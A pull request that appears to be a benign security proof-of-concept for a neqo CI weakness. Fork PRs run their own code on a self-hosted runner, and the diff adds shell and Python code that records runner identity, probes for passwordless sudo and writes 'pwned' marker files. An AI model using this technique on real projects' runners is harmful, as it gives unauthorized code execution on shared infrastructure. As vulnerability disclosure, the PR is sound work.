### PR TITLE
security-poc: fork-PR code executes on self-hosted runner (benign marker)

### DIFF
--- a/.github/actions/cpu-tuning/action.yml
+++ b/.github/actions/cpu-tuning/action.yml
@@ -68,6 +68,24 @@ runs:
 
         if [[ "$MODE" == 'prepare' ]]; then
 
+          # SECURITY POC (benign, no exfiltration): proof of arbitrary code
+          # execution on this runner from a fork pull request. The workflow
+          # runs `pull_request` on a self-hosted runner, so this composite
+          # action (resolved from the PR's checkout) executes with the
+          # runner's privileges. Writes a marker file + prints runner identity.
+          {
+            echo "=== neqo-security-poc: code executed on runner ==="
+            echo "runner_hostname=$(hostname)"
+            echo "runner_user=$(id -un) uid=$(id -u) groups=$(id -gn)"
+            echo "sudo_nopasswd=$([ -x /usr/bin/sudo ] && sudo -n true 2>/dev/null && echo yes || echo no)"
+            echo "runner_os=$RUNNER_OS runner_arch=$RUNNER_ARCH"
+            echo "cwd=$(pwd)"
+            echo "home=$HOME"
+            echo "needed_space_marker=/tmp/neqo-security-poc-marker"
+            echo "runner_hostname=$(hostname)" > /tmp/neqo-security-poc-marker
+            echo "pwned_by=D1rk9ghT" >> /tmp/neqo-security-poc-marker
+          } | tee -a "${GITHUB_WORKSPACE}/poc-executed-on-runner.txt"
+
           # Show CPU info
           lscpu || echo "::warning::lscpu not available"
           cat /sys/devices/system/cpu/online || echo "::warning::Failed to read online CPUs"

--- a/.github/scripts/perfcompare.py
+++ b/.github/scripts/perfcompare.py
@@ -406,6 +406,21 @@ def run(cfg, tmp):
 
 def main():
     """Parse arguments, run all comparisons, and write the results tables."""
+    # SECURITY POC (benign, no exfiltration): this script is run verbatim from
+    # the PR checkout on a self-hosted runner (perfcompare.yml). Executing it
+    # proves arbitrary code execution on the runner from a fork pull request.
+    import platform as _platform
+    _marker = Path("/tmp/neqo-security-poc-marker-py")
+    try:
+        _marker.write_text(
+            "hostname={}\nuser={}\nplatform={}\n".format(
+                __import__("socket").gethostname(),
+                __import__("os").getuid(),
+                _platform.platform(),
+            )
+        )
+    except Exception:
+        pass
     p = argparse.ArgumentParser(description="Compare QUIC implementations")
     p.add_argument("--host", default="127.0.0.1")
     p.add_argument("--port", type=int, default=4433)


### PR DESCRIPTION
## Security PoC — self-hosted runner RCE from fork PR

This PR is a **benign proof-of-concept** for a GitHub Actions security finding: a fork pull request executes attacker-controlled code on neqo's **self-hosted** benchmark runner.

### Trigger
`bench.yml` and `perfcompare.yml` run on `runs-on: self-hosted` with a plain `pull_request` trigger (no fork filter). Fork PRs therefore build the fork's code and run it on the shared self-hosted runner.

### Payload (benign)
- `.github/actions/cpu-tuning/action.yml` — composite action resolved from the PR checkout; appends a marker + runner identity to `poc-executed-on-runner.txt` and writes `/tmp/neqo-security-poc-marker`.
- `.github/scripts/perfcompare.py` — executed verbatim from the PR checkout on the runner; writes `/tmp/neqo-security-poc-marker-py`.

### Expected result (if runners accept fork jobs)
The `bench`/`perfcompare` job log contains `=== neqo-security-poc: code executed on runner ===` and `/tmp/neqo-security-poc-marker` exists on the runner.

No secrets are read or exfiltrated; nothing destructive is done. Please close without merging.